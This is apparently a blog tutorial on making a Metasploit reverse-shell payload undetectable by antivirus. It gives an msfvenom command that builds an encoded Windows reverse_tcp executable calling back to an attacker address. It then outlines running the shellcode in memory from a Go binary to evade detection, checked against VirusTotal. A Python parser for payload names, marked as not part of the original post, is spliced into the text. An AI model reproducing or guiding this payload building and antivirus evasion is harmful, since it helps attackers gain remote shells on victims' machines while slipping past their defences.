Undetected Metasploit Payload – A payload in Metasploit refers to an exploit module. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. These different types allow for a great deal of versatility and can be useful across numerous types of scenarios. Whether or not a payload is staged is represented by '/' in the payload name. For example, "windows/shell_bind_tcp" is a single payload with no stage, whereas "windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell).
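As an added example (not code from the original post), the following parser applies the naming convention just described to tell single payloads from staged ones. It goes slightly beyond the article by also handling an optional architecture segment (windows/x64/...) and the two-part platform used by cmd/* payloads; that handling, and the architecture list, are assumptions about Metasploit's naming rather than something the article states.

```python
# Added example, not from the original post: parse a Metasploit payload name
# and tell single payloads from staged ones by the "/" convention.
# Platform and arch handling beyond that convention is an assumption based on
# how Metasploit names its modules (e.g. windows/x64/..., cmd/unix/...).
from dataclasses import dataclass
from typing import Optional

# Architecture segments that may follow the platform; assumed, not exhaustive.
ARCH_SEGMENTS = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe",
                 "mips64", "ppc", "ppc64", "sparc"}


@dataclass(frozen=True)
class PayloadName:
    platform: str
    arch: Optional[str]
    staged: bool
    stage: str              # for a single payload this is the whole module name
    stager: Optional[str]   # transport stager (e.g. reverse_tcp); None for singles


def parse_payload_name(name: str) -> PayloadName:
    """Split 'platform[/arch]/payload' or 'platform[/arch]/stage/stager'."""
    parts = name.strip().split("/")
    if len(parts) < 2 or not all(parts):
        raise ValueError(f"not a payload name: {name!r}")
    platform, rest = parts[0], parts[1:]
    # cmd/* payloads carry a second platform segment (assumed convention).
    if platform == "cmd" and len(rest) >= 2:
        platform, rest = f"cmd/{rest[0]}", rest[1:]
    arch = None
    if len(rest) >= 2 and rest[0] in ARCH_SEGMENTS:
        arch, rest = rest[0], rest[1:]
    if len(rest) == 1:                      # single: no "/" left after platform/arch
        return PayloadName(platform, arch, False, rest[0], None)
    if len(rest) == 2:                      # staged: stage then stager
        return PayloadName(platform, arch, True, rest[0], rest[1])
    raise ValueError(f"unexpected payload name shape: {name!r}")


def is_staged(name: str) -> bool:
    return parse_payload_name(name).staged


if __name__ == "__main__":
    # Constructed sample names: the two from the article plus a few more shapes.
    for n in ["windows/shell_bind_tcp", "windows/shell/bind_tcp",
              "windows/x64/meterpreter/reverse_https",
              "linux/x64/shell_reverse_tcp", "cmd/unix/reverse_bash"]:
        p = parse_payload_name(n)
        print(f"{n:40} staged={p.staged} stage={p.stage} stager={p.stager}")
```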
In this article, I don't want to write too many words because I don't want someone copying my article, translating it into another language, printing it as a book and selling it for their own profit.
So, let's get started:
First, we need to build the payload using msfvenom:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.0.6 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/plagiator.exe
and scan it on VirusTotal.
At first I saved it as 1.exe, and here is the result:
Let's try changing the file name to plagiator.exe:
The number of detecting antivirus engines decreased by one. LOL..
So, we can learn from this case: one antivirus engine (Cybereason) does not want to get in touch with a PLAGIARIST. So, becoming a plagiarist could help us evade some security. LOL..
Next, let's try to run the payload on a Windows machine to make sure that it runs properly. But before we run it, we have to set up Metasploit on our machine to receive the connection.
Next, execute it on the Windows machine and wait until we get shell access.
OK, our binary loaded successfully. Now let's try to bypass some AV and hopefully get it FUD (fully undetectable).
We need to get the shellcode from the payload we used.
Now, let's execute the payload directly in memory by embedding the shellcode inside a binary. In this case I am using Go to build the binary.
For a reference on how to run shellcode from a binary, you can refer to this link.
Here is the scan result from VirusTotal.
And finally, our undetected Metasploit payload is successfully created. Here is the result when I combine this technique with this AntiVirus Evasion Technique.
The lesson is:
if you want to become a GREAT PLAGIARIST,
you have to encrypt your f*ckin face.
Please Donate To Bitcoin Address: [[address]]